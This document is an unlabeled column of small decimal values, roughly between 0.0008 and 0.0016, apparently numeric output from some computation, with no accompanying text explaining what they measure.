0.00118035
0.00118916
0.00119333
0.00119339
0.00118914
0.00119337
0.00118919
0.00118914
0.00118916
0.00119333
0.00119339
0.00118914
0.00119337
0.0011892
0.00118914
0.00118912
0.00119341
0.00119341
0.00119341
0.00118913
0.00118913
0.00118459
0.00118036
0.00118462
0.00118042
0.00118456
0.00118462
0.00118039
0.00118459
0.00118036
0.00118462
0.00118042
0.00118456
0.00118461
0.00118039
0.00114952
0.0011495
0.00114525
0.00114526
0.00114952
0.0011495
0.00114525
0.00115402
0.00115829
0.00115403
0.0011583
0.00115402
0.00115402
0.00115404
0.00115829
0.00115828
0.0011583
0.00115402
0.00115404
0.00114952
0.00114525
0.00114951
0.00114952
0.00114525
0.00115403
0.00114952
0.00114952
0.00114951
0.00114526
0.00114525
0.00114951
0.00114952
0.00114525
0.00115403
0.0011583
0.00115403
0.0011583
0.00115403
0.00115403
0.00115405
0.00115828
0.0011583
0.0011583
0.00115404
0.00115403
0.00114952
0.00114525
0.00114951
0.00114952
0.00114525
0.00115403
0.00114952
0.00114953
0.00114524
0.00114524
0.00114952
0.00114952
0.00114524
0.00115406
0.00115823
0.00115829
0.00115403
0.00115826
0.00115409
0.00115404
0.00115406
0.00115823
0.00115829
0.00115403
0.00115827
0.00115409
0.00115404
0.00115402
0.0011583
0.0011583
0.00115831
0.00115402
0.00115402
0.00114948
0.00114526
0.00114951
0.00114531
0.00114945
0.00114951
0.00114528
0.00114948
0.00114526
0.00114951
0.00114532
0.00114945
0.00114951
0.00114528
0.00111441
0.00111439
0.00111014
0.00111015
0.00111441
0.0011144
0.00111014
0.00111891
0.00112319
0.00111892
0.00112319
0.00111891
0.00111891
0.00111893
0.00112319
0.00112317
0.00112319
0.00111892
0.00111893
0.00111441
0.00111013
0.0011144
0.00111441
0.00111014
0.00111892
0.0011144
0.00111441
0.00111439
0.00111015
0.00111013
0.00111439
0.00111441
0.00111013
0.00111891
0.00112318
0.00111892
0.00112319
0.00111891
0.00111891
0.00111893
0.00112317
0.00112319
0.00112319
0.00111893
0.00111891
0.00111441
0.00111013
0.0011144
0.00111441
0.00111013
0.00111891
0.0011144
0.00111441
0.00111013
0.00111013
0.00111441
0.00111441
0.00111012
0.00111895
0.00112312
0.00112318
0.00111892
0.00112315
0.00111898
0.00111892
0.00111895
0.00112311
0.00112318
0.00111892
0.00112315
0.00111898
0.00111892
0.0011189
0.00112319
0.00112319
0.00112319
0.00111891
0.00111891
0.00111437
0.00111014
0.0011144
0.0011102
0.00111434
0.00111439
0.00111017
0.00111437
0.00111014
0.0011144
0.0011102
0.00111434
0.0011144
0.00111017
0.0010793
0.00107928
0.00107502
0.00107503
0.00107929
0.00107928
0.00107502
0.0010838
0.00108807
0.00108381
0.00108807
0.0010838
0.0010838
0.00108382
0.00108807
0.00108806
0.00108807
0.0010838
0.00108381
0.0010793
0.00107502
0.00107928
0.00107929
0.00107502
0.0010838
0.00107929
0.00107929
0.00107927
0.00107503
0.00107502
0.00107927
0.00107929
0.00107502
0.00108379
0.00108807
0.0010838
0.00108807
0.00108379
0.00108379
0.00108381
0.00108805
0.00108807
0.00108807
0.00108381
0.0010838
0.00107929
0.00107501
0.00107928
0.00107929
0.00107502
0.0010838
0.00107928
0.0010793
0.00107501
0.00107501
0.00107929
0.00107929
0.00107501
0.00108383
0.001088
0.00108806
0.0010838
0.00108803
0.00108386
0.0010838
0.00108383
0.001088
0.00108806
0.0010838
0.00108803
0.00108386
0.0010838
0.00108379
0.00108807
0.00108807
0.00108808
0.00108379
0.00108379
0.00107925
0.00107502
0.00107928
0.00107508
0.00107922
0.00107928
0.00107505
0.00107925
0.00107502
0.00107928
0.00107508
0.00107922
0.00107928
0.00107505
0.00104418
0.00104416
0.0010399
0.00103992
0.00104418
0.00104416
0.00103991
0.00104868
0.00105295
0.00104869
0.00105296
0.00104868
0.00104868
0.0010487
0.00105296
0.00105294
0.00105296
0.00104869
0.0010487
0.00104418
0.00103991
0.00104417
0.00104418
0.00103991
0.00104869
0.00104417
0.00104418
0.00104416
0.00103991
0.0010399
0.00104416
0.00104418
0.0010399
0.00104868
0.00105295
0.00104869
0.00105296
0.00104868
0.00104868
0.0010487
0.00105294
0.00105295
0.00105296
0.0010487
0.00104868
0.00104418
0.0010399
0.00104416
0.00104417
0.0010399
0.00104868
0.00104417
0.00104418
0.00103989
0.00103989
0.00104417
0.00104417
0.00103989
0.00104871
0.00105288
0.00105294
0.00104868
0.00105292
0.00104874
0.00104869
0.00104871
0.00105288
0.00105294
0.00104868
0.00105292
0.00104874
0.00104869
0.00104867
0.00105295
0.00105295
0.00105296
0.00104867
0.00104867
0.00104413
0.0010399
0.00104416
0.00103996
0.0010441
0.00104416
0.00103993
0.00104413
0.0010399
0.00104416
0.00103996
0.0010441
0.00104416
0.00103993
0.00100906
0.00100904
0.00100478
0.00100479
0.00100906
0.00100904
0.00100478
0.00101356
0.00101784
0.00101357
0.00101784
0.00101356
0.00101356
0.00101358
0.00101784
0.00101782
0.00101784
0.00101357
0.00101358
0.00100906
0.00100478
0.00100905
0.00100906
0.00100478
0.00101356
0.00100905
0.00100905
0.00100903
0.00100479
0.00100478
0.00100903
0.00100905
0.00100478
0.00101356
0.00101783
0.00101356
0.00101783
0.00101355
0.00101356
0.00101357
0.00101781
0.00101783
0.00101783
0.00101357
0.00101356
0.00100905
0.00100477
0.00100904
0.00100905
0.00100477
0.00101356
0.00100904
0.00100905
0.00100477
0.00100477
0.00100905
0.00100905
0.00100476
0.00101359
0.00101776
0.00101782
0.00101356
0.00101779
0.00101362
0.00101356
0.00101359
0.00101776
0.00101782
0.00101356
0.00101779
0.00101362
0.00101356
0.00101354
0.00101783
0.00101783
0.00101783
0.00101355
0.00101355
0.00100901
0.00100478
0.00100904
0.00100484
0.00100898
0.00100904
0.0010048
0.00100901
0.00100478
0.00100904
0.00100484
0.00100898
0.00100903
0.0010048
0.000973926
0.000973908
0.000969653
0.000969666
0.000973924
0.00097391
0.000969652
0.000978431
0.000982707
0.00097844
0.000982708
0.000978432
0.000978431
0.000978448
0.000982706
0.00098269
0.000982707
0.000978433
0.000978444
0.000973925
0.00096965
0.000973915
0.000973926
0.00096965
0.000978432
0.000973917
0.000973924
0.000973903
0.000969663
0.000969649
0.00097391
0.000973922
0.000969649
0.00097843
0.000982703
0.000978438
0.000982704
0.000978429
0.000978428
0.000978445
0.000982689
0.000982704
0.000982703
0.000978444
0.000978431
0.000973926
0.00096965
0.000973915
0.000973925
0.000969651
0.000978432
0.000973917
0.000973927
0.00096964
0.00096964
0.000973925
0.000973924
0.000969637
0.000978463
0.000982636
0.000982695
0.000978436
0.000982671
0.000978496
0.000978438
0.000978462
0.000982633
0.000982695
0.000978435
0.000982671
0.000978495
0.000978437
0.00097842
0.000982709
0.000982708
0.000982712
0.000978423
0.000978423
0.000973883
0.000969655
0.000973915
0.000969714
0.000973852
0.000973911
0.000969678
0.000973883
0.000969654
0.000973915
0.000969713
0.000973851
0.000973909
0.000969677
0.000938794
0.000938776
0.000934521
0.000934531
0.000938794
0.000938779
0.000934518
0.000943301
0.000947576
0.000943311
0.000947578
0.0009433
0.000943301
0.000943319
0.000947576
0.000947559
0.000947576
0.000943304
0.000943316
0.000938795
0.000934518
0.000938783
0.000938793
0.000934518
0.000943303
0.000938788
0.000938798
0.000938777
0.000934532
0.000934522
0.000938782
0.000938795
0.000934521
0.000943304
0.000947578
0.000943309
0.00094758
0.000943302
0.000943303
0.000943318
0.000947562
0.000947578
0.00094758
0.000943316
0.000943304
0.000938798
0.000934518
0.000938783
0.000938797
0.00093452
0.000943305
0.00093879
0.000938795
0.000934509
0.000934509
0.000938792
0.000938792
0.000934506
0.000943331
0.000947503
0.000947564
0.000943304
0.000947538
0.000943363
0.000943307
0.000943332
0.000947503
0.000947564
0.000943306
0.000947538
0.000943364
0.000943307
0.000943289
0.000947577
0.000947578
0.000947581
0.000943292
0.000943292
0.000938754
0.000934524
0.000938784
0.00093458
0.00093872
0.000938779
0.000934548
0.000938754
0.000934523
0.000938784
0.000934583
0.000938722
0.000938778
0.000934548
0.000903659
0.000903644
0.000899387
0.000899401
0.00090366
0.000903645
0.000899385
0.000908164
0.00091244
0.000908173
0.000912441
0.000908164
0.000908163
0.000908186
0.00091244
0.000912424
0.000912439
0.000908167
0.000908178
0.000903659
0.000899384
0.000903649
0.000903658
0.000899384
0.00090817
0.000903657
0.00090366
0.000903644
0.000899398
0.000899388
0.000903645
0.000903661
0.000899384
0.000908168
0.000912445
0.000908177
0.000912446
0.000908168
0.000908167
0.000908187
0.000912431
0.000912445
0.000912446
0.000908182
0.000908171
0.000903662
0.000899384
0.00090365
0.000903661
0.000899385
0.000908172
0.000903656
0.000903666
0.000899379
0.000899382
0.000903662
0.000903664
0.000899378
0.000908199
0.00091237
0.000912432
0.00090817
0.000912406
0.000908233
0.000908174
0.000908201
0.000912373
0.000912433
0.000908176
0.000912407
0.000908235
0.000908177
0.000908158
0.000912446
0.000912447
0.00091245
0.000908161
0.000908162
0.000903623
0.000899392
0.00090365
0.000899453
0.000903591
0.000903647
0.000899418
0.000903625
0.000899398
0.000903657
0.000899452
0.000903592
0.000903652
0.00089942
0.000868531
0.000868516
0.000864256
0.000864267
0.00086853
0.000868517
0.000864254
0.000873037
0.000877314
0.000873047
0.000877314
0.000873039
0.000873038
0.000873057
0.000877313
0.0008773
0.000877314
0.00087304
0.000873054
0.00086853
0.000864252
0.00086852
0.00086853
0.000864253
0.00087304
0.000868525
0.000868529
0.000868512
0.000864265
0.000864256
0.000868513
0.000868529
0.000864253
0.000873037
0.000877312
0.000873044
0.000877313
0.000873037
0.000873036
0.000873053
0.000877298
0.00087731
0.000877312
0.000873051
0.000873037
0.000868531
0.000864253
0.000868519
0.00086853
0.000864254
0.00087304
0.000868527
0.000868536
0.00086425
0.00086425
0.000868534
0.000868533
0.000864247
0.000873071
0.000877242
0.000877303
0.000873045
0.000877278
0.000873103
0.000873047
0.000873071
0.000877243
0.000877301
0.000873042
0.000877277
0.000873104
0.000873045
0.000873028
0.000877316
0.000877316
0.000877319
0.000873032
0.000873031
0.000868493
0.000864265
0.000868525
0.000864323
0.00086846
0.00086852
0.000864289
0.000868492
0.000864263
0.000868522
0.000864322
0.000868461
0.000868518
0.000864288
0.000833399
0.00083338
0.000829121
0.000829137
0.000833396
0.000833385
0.000829123
0.000837905
0.000842179
0.000837912
0.000842181
0.000837904
0.000837905
0.000837923
0.000842181
0.000842164
0.000842181
0.000837907
0.000837919
0.000833401
0.000829123
0.000833388
0.000833399
0.000829125
0.000837907
0.000833393
0.000833406
0.00083339
0.000829143
0.000829133
0.000833391
0.000833406
0.00082913
0.000837911
0.000842185
0.000837917
0.000842187
0.00083791
0.000837911
0.000837932
0.00084217
0.000842187
0.000842187
0.000837925
0.000837915
0.000833405
0.000829125
0.000833391
0.000833403
0.000829128
0.000837913
0.000833399
0.000833405
0.000829118
0.000829117
0.000833402
0.000833402
0.000829114
0.000837942
0.000842113
0.000842173
0.000837914
0.000842149
0.000837973
0.000837916
0.000837942
0.000842112
0.000842174
0.000837914
0.00084215
0.000837973
0.000837916
0.000837898
0.000842187
0.000842188
0.000842191
0.000837902
0.000837902
0.000833363
0.000829132
0.000833393
0.000829191
0.00083333
0.000833388
0.000829158
0.000833363
0.000829131
0.000833391
0.000829192
0.000833331
0.000833388
0.000829158
0.000798271
0.000798255
0.000793998
0.000794008
0.000798271
0.000798255
0.000793996
0.000802777
0.000807049
0.000802786
0.000807053
0.000802775
0.000802776
0.000802795
0.000807052
0.000807035
0.000807052
0.000802779
0.00080279
0.000798273
0.000793995
0.000798261
0.000798271
0.000793996
0.00080278
0.000798265
0.000798275
0.000798258
0.000794012
0.000794001
0.000798258
0.000798275
0.000794
0.000802783
0.000807059
0.000802791
0.00080706
0.000802782
0.000802781
0.0008028
0.000807043
0.000807057
0.000807058
0.000802795
0.000802784
0.000798277
0.000793997
0.000798265
0.000798274
0.000794001
0.000802784
0.000798267
0.000798277
0.000793991
0.000793992
0.000798274
0.000798275
0.000793988
0.000802811
0.000806981
0.000807042
0.000802784
0.000807016
0.000802842
0.000802786
0.000802811
0.000806982
0.000807042
0.000802785
0.000807017
0.000802843
0.000802788
0.000802768
0.000807056
0.000807056
0.000807059
0.000802772
0.000802773
0.000798234
0.000794004
0.000798263
0.000794063
0.000798201
0.000798259
0.000794028
0.000798234
0.000794006
0.000798264
0.000794063
0.000798201
0.000798262
0.000794029
0.00164533
0.0016408
0.00164533
0.0016408
0.00164082
0.00163652
0.00163653
0.00164081
0.00164082
0.00163652
0.00164537
0.00164956
0.00164533
0.0016496
0.00164533
0.00164541
0.00164958
0.00164537
0.00164954
0.00164533
0.00164961
0.00164534
0.0016454
0.00164958
0.00164078
0.00163654
0.0016408
0.00163661
0.0016408
0.00163657
0.00164075
0.00164078
0.00163654
0.0016408
0.00163661
0.0016408
0.00163657
0.00164076
0.00164532
0.00164962
0.00164962
0.00164532
0.00164533
0.00164962
0.00162321
0.00162773
0.00162321
0.00162773
0.00162773
0.00163202
0.00163202
0.00163202
0.00162773
0.00162773
0.00162319
0.00161902
0.00162321
0.00161895
0.00162321
0.00162316
0.00161898
0.00162319
0.00161902
0.00162321
0.00161895
0.00162321
0.00162317
0.00161898
0.00162777
0.001632
0.00163195
0.00162774
0.00163198
0.00162774
0.00162781
0.00162778
0.001632
0.00163195
0.00162774
0.00163198
0.00162774
0.00162781
0.00162323
0.00161894
0.00161894
0.00162322
0.00162322
0.00161893
0.0016408
0.00163652
0.00163654
0.00164079
0.0016408
0.00164079
0.00163652
0.00164532
0.00164533
0.00164961
0.00164532
0.00164961
0.0016408
0.00163652
0.00164079
0.0016408
0.00163652
0.00164532
0.00164534
0.0016496
0.00164959
0.00164532
0.00164533
0.00164961
0.00162772
0.001632
0.00163199
0.00162774
0.001632
0.00162772
0.00162774
0.00162321
0.0016232
0.00161894
0.00161894
0.00162321
0.00162772
0.00163201
0.00162773
0.00163201
0.00162772
0.00162321
0.0016232
0.00161894
0.00161895
0.00161894
0.00162321
0.0016232
0.00162773
0.001632
0.00163199
0.00162774
0.00163201
0.00162772
0.00162774
0.00162322
0.00162321
0.00161894
0.00162322
0.00161894
0.00162773
0.00163201
0.00162774
0.00163201
0.00162773
0.00162322
0.0016232
0.00161894
0.00161895
0.00162321
0.0016232
0.00161894
0.00164082
0.00163652
0.00163652
0.00164081
0.00164081
0.00163652
0.00164536
0.00164955
0.00164533
0.0016496
0.00164533
0.0016454
0.00164958
0.00164536
0.00164955
0.00164533
0.0016496
0.00164541
0.00164534
0.00164958
0.00164078
0.00163654
0.0016408
0.00163661
0.0016408
0.00164075
0.00163657
0.00164078
0.00163654
0.0016408
0.00163661
0.00164075
0.0016408
0.00163657
0.00164532
0.00164962
0.00164962
0.00164532
0.00164532
0.00164962
0.00164533
0.0016408
0.00162321
0.00162773
0.00162773
0.00163202
0.00163202
0.00163202
0.00162773
0.00162773
0.00162319
0.00161902
0.00162321
0.00161895
0.00162316
0.00162321
0.00161898
0.00162319
0.00161902
0.00162321
0.00161895
0.00162321
0.00162316
0.00161898
0.00162777
0.001632
0.00163195
0.00162774
0.00162781
0.00163198
0.00162774
0.00162777
0.001632
0.00163195
0.00162774
0.00163198
0.00162774
0.00162781
0.00162323
0.00161894
0.00161894
0.00162322
0.00162322
0.00161893
0.00162321
0.00162773
0.00164081
0.00163652
0.00163654
0.00164079
0.0016408
0.00164079
0.00163652
0.00164532
0.00164533
0.00164961
0.00164532
0.00164961
0.00164081
0.00163652
0.00164079
0.00164081
0.00163652
0.00164532
0.00164534
0.00164961
0.00164959
0.00164532
0.00164534
0.00164961
0.00162773
0.00163199
0.00163201
0.00162775
0.00163201
0.00162774
0.00162773
0.00162322
0.00162321
0.00161894
0.00161894
0.00162322
0.00162773
0.00163201
0.00162774
0.00163201
0.00162773
0.00162322
0.0016232
0.00161895
0.00161894
0.00161894
0.0016232
0.00162322
0.00162772
0.00163201
0.00163199
0.00162775
0.00163201
0.00162773
0.00162774
0.00162321
0.0016232
0.00161894
0.00162321
0.00161893
0.00162772
0.00163201
0.00162773
0.00163201
0.00162772
0.00162322
0.0016232
0.00161894
0.00161895
0.00162321
0.0016232
0.00161894
0.00164081
0.00163654
0.00163652
0.00164079
0.00164079
0.0016408
0.00163652
0.00164532
0.00164533
0.00164961
0.00164532
0.00164961
0.00164081
0.00163652
0.0016408
0.00164081
0.00163652
0.00164532
0.00164534
0.0016496
0.00164961
0.00164534
0.00164532
0.00164961
0.0016408
0.00163652
0.00163654
0.00164079
0.0016408
0.00164079
0.00163652
0.00164532
0.00164533
0.0016496
0.00164532
0.00164961
0.0016408
0.00163652
0.00164079
0.00164081
0.00163652
0.00164532
0.00164534
0.00164961
0.00164959
0.00164532
0.00164533
0.00164961
0.00162773
0.00163199
0.00163201
0.00162775
0.00163201
0.00162774
0.00162773
0.00162322
0.00162321
0.00161894
0.00162322
0.00161894
0.00162773
0.00163201
0.00162774
0.00163201
0.00162773
0.00162322
0.0016232
0.00161896
0.00161894
0.00162321
0.00162322
0.00161894
0.00162773
0.001632
0.00163199
0.00162775
0.00163201
0.00162773
0.00162774
0.00162322
0.00162321
0.00161894
0.00162322
0.00161894
0.00162773
0.00163201
0.00162774
0.00163201
0.00162773
0.00162322
0.0016232
0.00161894
0.00161896
0.00162322
0.0016232
0.00161894
0.00164081
0.00163652
0.00163652
0.00164081
0.00164081
0.00163652
0.00164536
0.00164955
0.00164533
0.0016496
0.00164533
0.0016454
0.00164958
0.00164536
0.00164955
0.00164533
0.0016496
0.0016454
0.00164533
0.00164958
0.00164078
0.00163653
0.0016408
0.00163661
0.0016408
0.00164075
0.00163656
0.00164078
0.00163653
0.0016408
0.00163661
0.00164075
0.0016408
0.00163656
0.00164532
0.00164962
0.00164961
0.00164532
0.00164532
0.00164962
0.00164533
0.0016408
0.00162321
0.00162773
0.00162772
0.00163201
0.00163201
0.00163202
0.00162772
0.00162772
0.00162318
0.00161902
0.00162321
0.00161895
0.00162316
0.00162321
0.00161898
0.00162319
0.00161902
0.00162321
0.00161895
0.00162321
0.00162316
0.00161898
0.00162777
0.001632
0.00163195
0.00162773
0.00162781
0.00163198
0.00162774
0.00162777
0.001632
0.00163195
0.00162774
0.00163198
0.00162774
0.00162781
0.00162322
0.00161893
0.00161894
0.00162322
0.00162322
0.00161893
0.00162321
0.00162773
0.00164081
0.00163654
0.00163652
0.00164079
0.00164079
0.0016408
0.00163652
0.00164532
0.00164533
0.00164961
0.00164532
0.00164961
0.00164081
0.00163652
0.0016408
0.00164081
0.00163652
0.00164532
0.00164534
0.00164959
0.00164961
0.00164534
0.00164532
0.00164961
0.00164081
0.00163654
0.00163652
0.00164079
0.00164079
0.0016408
0.00163652
0.00164532
0.00164533
0.00164961
0.00164532
0.00164961
0.00164081
0.00163652
0.00164079
0.0016408
0.00163652
0.00164532
0.00164534
0.00164959
0.00164961
0.00164534
0.00164532
0.00164961
0.00162772
0.00163199
0.001632
0.00162775
0.00163201
0.00162774
0.00162773
0.00162322
0.0016232
0.00161894
0.00162322
0.00161894
0.00162773
0.00163201
0.00162773
0.00163201
0.00162773
0.00162321
0.0016232
0.00161895
0.00161894
0.0016232
0.00162321
0.00161894
0.00162772
0.00163199
0.001632
0.00162774
0.00163201
0.00162774
0.00162773
0.00162322
0.00162321
0.00161894
0.00162322
0.00161894
0.00162773
0.00163201
0.00162774
0.00163201
0.00162773
0.00162322
0.0016232
0.00161896
0.00161894
0.0016232
0.00162321
0.00161894
0.00164532
0.0016408
0.00164532
0.0016408
0.00162773
0.00163202
0.00163202
0.00163202
0.00162773
0.00162773
0.00162319
0.00161902
0.00162321
0.00161895
0.00161898
0.00162316
0.00162321
0.00162319
0.00161903
0.00162321
0.00161895
0.00161899
0.00162316
0.00162321
0.00162777
0.001632
0.00163195
0.00162774
0.00163198
0.00162781
0.00162774
0.00162777
0.001632
0.00163195
0.00162774
0.00163198
0.00162781
0.00162774
0.00162323
0.00161894
0.00161894
0.00161893
0.00162322
0.00162322
0.00162321
0.00162773
0.00162321
0.00162773
0.00161016
0.00160564
0.00161016
0.00160564
0.00160566
0.00160137
0.00160137
0.00160565
0.00160565
0.00160136
0.0016102
0.00161437
0.00161442
0.00161016
0.0016144
0.00161017
0.00161024
0.0016102
0.00161437
0.00161442
0.00161016
0.0016144
0.00161017
0.00161024
0.00161015
0.00161444
0.00161444
0.00161444
0.00161015
0.00161015
0.00160562
0.00160138
0.00160564
0.00160145
0.00160564
0.00160141
0.00160559
0.00160562
0.00160138
0.00160564
0.00160145
0.00160564
0.00160141
0.00160559
0.00158808
0.00159259
0.00158808
0.00159259
0.00159259
0.00159687
0.00159687
0.00159687
0.00159259
0.00159259
0.00158806
0.0015839
0.00158808
0.00158383
0.00158808
0.00158803
0.00158386
0.00158806
0.0015839
0.00158808
0.00158383
0.00158808
0.00158803
0.00158386
0.00159263
0.00159686
0.0015968
0.0015926
0.00159683
0.0015926
0.00159267
0.00159263
0.00159685
0.0015968
0.0015926
0.00159683
0.0015926
0.00159267
0.0015881
0.00158381
0.00158381
0.00158809
0.00158809
0.00158381
0.00160565
0.00160563
0.00160137
0.00160139
0.00160565
0.00160563
0.00160137
0.00161015
0.00161443
0.00161016
0.00161443
0.00161015
0.00161015
0.00161018
0.00161443
0.00161441
0.00161015
0.00161443
0.00161017
0.00160565
0.00160137
0.00160564
0.00160565
0.00160137
0.00159259
0.00159686
0.00159685
0.00159261
0.00159687
0.00159259
0.00159261
0.00158809
0.00158807
0.00158381
0.00158381
0.00158809
0.00159259
0.00159686
0.0015926
0.00159686
0.00159259
0.00158809
0.00158808
0.00158382
0.00158383
0.00158382
0.00158809
0.00158807
0.00159259
0.00159687
0.00159685
0.00159261
0.00159687
0.0015926
0.00159261
0.00158809
0.00158808
0.00158382
0.00158809
0.00158382
0.00159259
0.00159686
0.0015926
0.00159687
0.00159259
0.00158809
0.00158808
0.00158382
0.00158383
0.00158809
0.00158808
0.00158382
0.00160566
0.00160137
0.00160137
0.00160565
0.00160565
0.00160137
0.0016102
0.00161437
0.00161442
0.00161016
0.00161017
0.0016144
0.00161024
0.0016102
0.00161437
0.00161442
0.00161016
0.00161024
0.0016144
0.00161017
0.00161015
0.00161443
0.00161444
0.00161015
0.00161444
0.00161015
0.00160562
0.00160138
0.00160564
0.00160146
0.00160564
0.00160559
0.00160141
0.00160562
0.00160138
0.00160564
0.00160145
0.00160559
0.00160564
0.00160141
0.00161016
0.00160564
0.00158808
0.00159259
0.00159259
0.00159687
0.00159687
0.00159688
0.00159259
0.00159259
0.00158806
0.0015839
0.00158808
0.00158383
0.00158803
0.00158808
0.00158386
0.00158806
0.0015839
0.00158808
0.00158383
0.00158808
0.00158804
0.00158386
0.00159264
0.00159686
0.00159681
0.0015926
0.00159268
0.00159684
0.0015926
0.00159264
0.00159686
0.0015968
0.0015926
0.00159684
0.00159261
0.00159268
0.0015881
0.00158381
0.00158382
0.00158809
0.0015881
0.00158381
0.00158808
0.00159259
0.00160564
0.00160563
0.00160137
0.00160138
0.00160564
0.00160563
0.00160137
0.00161015
0.00161443
0.00161016
0.00161443
0.00161015
0.00161015
0.00161017
0.00161443
0.00161441
0.00161015
0.00161443
0.00161017
0.00160564
0.00160137
0.00160563
0.00160564
0.00160137
0.00159259
0.00159685
0.00159686
0.00159261
0.00159686
0.0015926
0.00159259
0.00158808
0.00158807
0.00158381
0.00158381
0.00158808
0.00159259
0.00159686
0.0015926
0.00159686
0.00159259
0.00158808
0.00158807
0.00158383
0.00158381
0.00158381
0.00158807
0.00158808
0.00159259
0.00159686
0.00159685
0.00159261
0.00159686
0.00159259
0.0015926
0.00158808
0.00158807
0.00158381
0.00158808
0.00158381
0.00159259
0.00159686
0.00159259
0.00159686
0.00159258
0.00158808
0.00158807
0.00158381
0.00158383
0.00158808
0.00158807
0.00158381
0.00160564
0.00160563
0.00160138
0.00160137
0.00160563
0.00160564
0.00160137
0.00161015
0.00161443
0.00161016
0.00161015
0.00161443
0.00161015
0.00161017
0.00161441
0.00161443
0.00161017
0.00161443
0.00161015
0.00160565
0.00160137
0.00160563
0.00160565
0.00160137
0.00160565
0.00160563
0.00160137
0.00160139
0.00160564
0.00160563
0.00160137
0.00161015
0.00161443
0.00161016
0.00161443
0.00161015
0.00161015
0.00161018
0.00161443
0.00161442
0.00161443
0.00161015
0.00161017
0.00160565
0.00160137
0.00160563
0.00160565
0.00160137
0.00159259
0.00159685
0.00159686
0.00159261
0.00159686
0.00159261
0.00159259
0.00158809
0.00158808
0.00158381
0.00158809
0.00158381
0.00159259
0.00159686
0.0015926
0.00159686
0.00159259
0.00158809
0.00158807
0.00158383
0.00158381
0.00158808
0.00158809
0.00158381
0.00159259
0.00159686
0.00159685
0.00159261
0.00159686
0.00159259
0.00159261
0.00158809
0.00158807
0.00158381
0.00158809
0.00158381
0.00159259
0.00159686
0.0015926
0.00159686
0.00159259
0.00158809
0.00158807
0.00158382
0.00158383
0.00158809
0.00158807
0.00158381
0.00160566
0.00160137
0.00160137
0.00160565
0.00160565
0.00160137
0.0016102
0.00161437
0.00161442
0.00161016
0.00161017
0.0016144
0.00161024
0.0016102
0.00161437
0.00161442
0.00161016
0.00161023
0.0016144
0.00161017
0.00161015
0.00161443
0.00161444
0.00161015
0.00161444
0.00161015
0.00160562
0.00160138
0.00160564
0.00160145
0.00160564
0.00160559
0.00160141
0.00160562
0.00160138
0.00160564
0.00160145
0.00160559
0.00160564
0.00160141
0.00161015
0.00160564
0.00158808
0.00159259
0.00159259
0.00159687
0.00159687
0.00159687
0.00159259
0.00159259
0.00158806
0.0015839
0.00158808
0.00158383
0.00158803
0.00158808
0.00158386
0.00158806
0.0015839
0.00158808
0.00158383
0.00158808
0.00158803
0.00158386
0.00159264
0.00159686
0.00159681
0.0015926
0.00159267
0.00159684
0.0015926
0.00159264
0.00159686
0.0015968
0.0015926
0.00159684
0.0015926
0.00159267
0.0015881
0.00158381
0.00158381
0.00158809
0.00158809
0.00158381
0.00158808
0.00159259
0.00160564
0.00160563
0.00160138
0.00160137
0.00160563
0.00160564
0.00160137
0.00161015
0.00161443
0.00161016
0.00161015
0.00161443
0.00161015
0.00161017
0.00161441
0.00161442
0.00161017
0.00161443
0.00161015
0.00160564
0.00160137
0.00160563
0.00160564
0.00160137
0.00160565
0.00160563
0.00160139
0.00160137
0.00160563
0.00160564
0.00160137
0.00161015
0.00161443
0.00161016
0.00161443
0.00161015
0.00161015
0.00161017
0.00161441
0.00161443
0.00161443
0.00161017
0.00161015
0.00160565
0.00160137
0.00160564
0.00160565
0.00160137
0.00159259
0.00159685
0.00159686
0.00159261
0.00159686
0.0015926
0.00159259
0.00158809
0.00158808
0.00158381
0.00158809
0.00158382
0.00159259
0.00159686
0.0015926
0.00159686
0.00159259
0.00158809
0.00158808
0.00158383
0.00158382
0.00158807
0.00158809
0.00158382
0.00159259
0.00159685
0.00159686
0.00159261
0.00159687
0.00159261
0.00159259
0.00158809
0.00158808
0.00158381
0.00158809
0.00158382
0.00159259
0.00159686
0.0015926
0.00159686
0.00159259
0.00158809
0.00158808
0.00158383
0.00158382
0.00158808
0.00158809
0.00158382
0.00161016
0.00160564
0.00161016
0.00160564
0.00159259
0.00159687
0.00159687
0.00159688
0.00159259
0.00159259
0.00158806
0.0015839
0.00158808
0.00158383
0.00158386
0.00158803
0.00158808
0.00158806
0.0015839
0.00158808
0.00158383
0.00158386
0.00158803
0.00158808
0.00159264
0.00159686
0.00159681
0.0015926
0.00159684
0.00159267
0.00159261
0.00159264
0.00159686
0.00159681
0.0015926
0.00159684
0.00159267
0.00159261
0.0015881
0.00158382
0.00158382
0.00158381
0.0015881
0.0015881
0.00158808
0.00159259
0.00158808
0.0015926
0.00157504
0.00157053
0.00157504
0.00157053
0.00157055
0.00156627
0.00156627
0.00157054
0.00157054
0.00156627
0.00157508
0.00157925
0.0015793
0.00157505
0.00157928
0.00157505
0.00157512
0.00157508
0.00157925
0.0015793
0.00157505
0.00157928
0.00157505
0.00157512
0.00157504
0.00157932
0.00157932
0.00157932
0.00157504
0.00157504
0.00157051
0.00156628
0.00157053
0.00156635
0.00157053
0.00156631
0.00157048
0.00157051
0.00156628
0.00157053
0.00156635
0.00157053
0.00156631
0.00157048
0.00155299
0.0015575
0.001553
0.0015575
0.0015575
0.00156178
0.00156178
0.00156178
0.0015575
0.0015575
0.00155297
0.00154881
0.00155299
0.00154874
0.00155299
0.00155294
0.00154877
0.00155297
0.00154881
0.001553
0.00154874
0.00155299
0.00155294
0.00154877
0.00155754
0.00156176
0.0015617
0.00155751
0.00156174
0.00155751
0.00155758
0.00155754
0.00156176
0.00156171
0.00155751
0.00156174
0.00155751
0.00155758
0.00155301
0.00154873
0.00154873
0.00155301
0.00155301
0.00154873
0.00157054
0.00157052
0.00156626
0.00156628
0.00157053
0.00157052
0.00156626
0.00157504
0.00157931
0.00157505
0.00157931
0.00157504
0.00157504
0.00157506
0.00157931
0.0015793
0.00157504
0.00157931
0.00157506
0.00157054
0.00156626
0.00157053
0.00157054
0.00156626
0.00155749
0.00156176
0.00156174
0.00155751
0.00156176
0.00155749
0.00155751
0.00155299
0.00155298
0.00154872
0.00154872
0.00155299
0.00155749
0.00156176
0.0015575
0.00156176
0.00155749
0.00155299
0.00155298
0.00154872
0.00154874
0.00154872
0.00155299
0.00155298
0.00155749
0.00156176
0.00156175
0.00155751
0.00156176
0.00155749
0.00155751
0.00155299
0.00155298
0.00154872
0.00155299
0.00154872
0.00155749
0.00156176
0.0015575
0.00156176
0.00155749
0.00155299
0.00155298
0.00154872
0.00154874
0.00155299
0.00155298
0.00154872
0.00157055
0.00156627
0.00156627
0.00157055
0.00157055
0.00156627
0.00157509
0.00157925
